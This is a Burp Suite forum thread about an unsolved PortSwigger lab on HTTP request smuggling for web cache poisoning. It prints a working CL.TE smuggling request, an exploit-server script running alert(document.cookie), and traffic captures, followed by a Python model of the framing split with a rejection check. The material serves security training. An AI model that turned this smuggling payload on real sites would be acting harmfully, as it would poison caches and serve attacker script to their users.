The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Unable to solve: Lab: Exploiting HTTP request smuggling to perform web cache poisoning

2lfa | Last updated: Jul 30, 2024 01:37PM UTC

As the title states, I am unable to solve this lab. I follow the exploit steps, and it works: I manage to poison the cache and get a redirection to my exploit server, so that the alert gets executed (even though it's empty). But the lab doesn't get solved!!

On the exploit server my crafted response looks like this:

-------------------------------------------------
HTTP/2 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Academy Exploit Server
Content-Length: 22

alert(document.cookie)
-------------------------------------------------

My exploit looks like the following:

-------------------------------------------------
POST / HTTP/1.1
Host: abcdabcdabcdabcdabcdabcdabcdabcde.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
Transfer-Encoding: chunked

0

GET /post/next?postId=3 HTTP/1.1
Host: exploit-exploitexploitexploitexploitexpl.exploit-server.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

x=1
-------------------------------------------------

After I manage to poison the cache I obtain:

-------------------------------------------------
REQUEST
-------------------------------------------------
GET /resources/js/tracking.js HTTP/2
Host: abcdabcdabcdabcdabcdabcdabcdabc.web-security-academy.net
Cookie: session=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://abcdabcdabcdabcdabcdabcdabcdabc.web-security-academy.net/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Te: trailers
-------------------------------------------------
-------------------------------------------------
RESPONSE
-------------------------------------------------
HTTP/2 302 Found
Location: https://exploit-exploitexploitexploitexploitexpl.exploit-server.net/post?postId=4
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=30
Age: 8
X-Cache: hit
Content-Length: 0
-------------------------------------------------
-------------------------------------------------
REQUEST
-------------------------------------------------
GET /post?postId=4 HTTP/2
Host: exploit-exploitexploitexploitexploitexpl.exploit-server.net
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://abcdabcdabcdabcdabcdabcdabcdabc.web-security-academy.net/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Te: trailers
-------------------------------------------------
-------------------------------------------------
RESPONSE
-------------------------------------------------
HTTP/2 200 OK
Content-Type: text/javascript; charset=utf-8
Server: Academy Exploit Server
Content-Length: 22

alert(document.cookie)
-------------------------------------------------

Why doesn't the lab get solved even though I get a redirection to my exploit server and the alert script is executed?!
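The post's request carries both Content-Length and Transfer-Encoding, which is the framing disagreement (CL.TE) the lab is built on: a front end that trusts Content-Length forwards the whole body, while a back end that trusts chunked encoding stops at the `0` chunk and treats the rest as the start of a new request. As an added example, not code from the post or from PortSwigger, the Python below models that split on a constructed request of the same shape (placeholder hosts `lab.example` and `exploit-server.example`) and shows the proxy-side check that rejects such ambiguous framing, as RFC 9112 section 6.3 permits.

```python
from __future__ import annotations
from typing import NamedTuple


class Framing(NamedTuple):
    content_length: int | None
    chunked: bool
    te_body: bytes    # body as a chunked (Transfer-Encoding) parser decodes it
    leftover: bytes   # bytes a chunked parser leaves unread on the connection

def parse_chunked(raw: bytes) -> tuple[bytes, int]:
    """Decode a chunked body; return (decoded bytes, bytes consumed)."""
    pos, out = 0, b""
    while True:
        end = raw.index(b"\r\n", pos)
        size = int(raw[pos:end].split(b";")[0], 16)  # drop chunk extensions
        pos = end + 2
        if size == 0:                                 # last-chunk: skip any trailers
            return out, raw.index(b"\r\n\r\n", pos - 2) + 4
        out += raw[pos:pos + size]
        pos += size + 2                               # chunk data plus its CRLF

def analyse(raw: bytes) -> Framing:
    """Frame the body as a CL-honouring front end forwards it to a TE-honouring back end."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    headers: dict[bytes, bytes] = {}
    for line in head.split(b"\r\n")[1:]:              # skip the request line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    cl = int(headers[b"content-length"]) if b"content-length" in headers else None
    chunked = headers.get(b"transfer-encoding", b"").lower() == b"chunked"
    forwarded = rest[:cl] if cl is not None else rest
    te_body, used = parse_chunked(forwarded) if chunked else (forwarded, len(forwarded))
    return Framing(cl, chunked, te_body, forwarded[used:])

def check(raw: bytes) -> str:
    """RFC 9112 6.3: a request carrying both framing headers may be rejected outright."""
    f = analyse(raw)
    if f.content_length is not None and f.chunked:
        return f"REJECT: CL and TE both present; {len(f.leftover)} bytes left for the back end"
    return "OK"

# Constructed sample in the shape of the forum post's request (placeholder hosts).
SMUGGLED = (b"GET /post/next?postId=3 HTTP/1.1\r\nHost: exploit-server.example\r\n"
            b"Content-Length: 10\r\n\r\nx=1")
BODY = b"0\r\n\r\n" + SMUGGLED
SAMPLE = (b"POST / HTTP/1.1\r\nHost: lab.example\r\nTransfer-Encoding: chunked\r\n"
          b"Content-Length: %d\r\n\r\n" % len(BODY) + BODY)
```

`analyse(SAMPLE).leftover` is exactly the smuggled GET, which is why the next request on that back-end connection, the victim's `tracking.js` fetch, gets answered with the redirect and then cached.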

Michelle, PortSwigger Agent | Last updated: Jul 31, 2024 12:15PM UTC